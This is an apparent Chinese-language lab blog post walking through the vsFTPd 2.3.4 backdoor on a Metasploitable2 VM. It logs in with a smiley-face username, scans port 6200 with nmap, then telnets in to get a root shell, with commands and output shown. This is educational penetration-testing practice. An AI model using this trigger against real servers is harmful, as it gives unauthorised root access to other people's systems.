Sunday, August 23, 2020

建立連線至 metasploitable2,TCP 21 連接埠存在一個 CVE 漏洞

 root@kali:/home/kali/Desktop/class2/practice-10# telnet 192.168.92.129 21

Trying 192.168.92.129...

Connected to 192.168.92.129.

Escape character is '^]'.

220 (vsFTPd 2.3.4)

user 1234:)

331 Please specify the password.

pass 12345

==============================================================

檢查是否有開啟 6200 port

kali@kali:~$ sudo nmap -sS -p 6200 192.168.92.129

[sudo] password for kali: 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 07:22 EDT

Nmap scan report for 192.168.92.129

Host is up (0.00028s latency).


PORT     STATE SERVICE

6200/tcp open  lm-x

MAC Address: 00:0C:29:D9:F1:65 (VMware)


Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

kali@kali:~$ 

===============================================================
透過 6200 port 進行登入

kali@kali:~$ telnet 192.168.92.129 6200
Trying 192.168.92.129...
Connected to 192.168.92.129.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found


No comments:

Post a Comment

n8n index

 【n8n免費本地端部署】Windows版|程式安裝x指令大補帖  【一鍵安裝 n8n】圖文教學,獲得無限額度自動化工具&限時免費升級企業版功能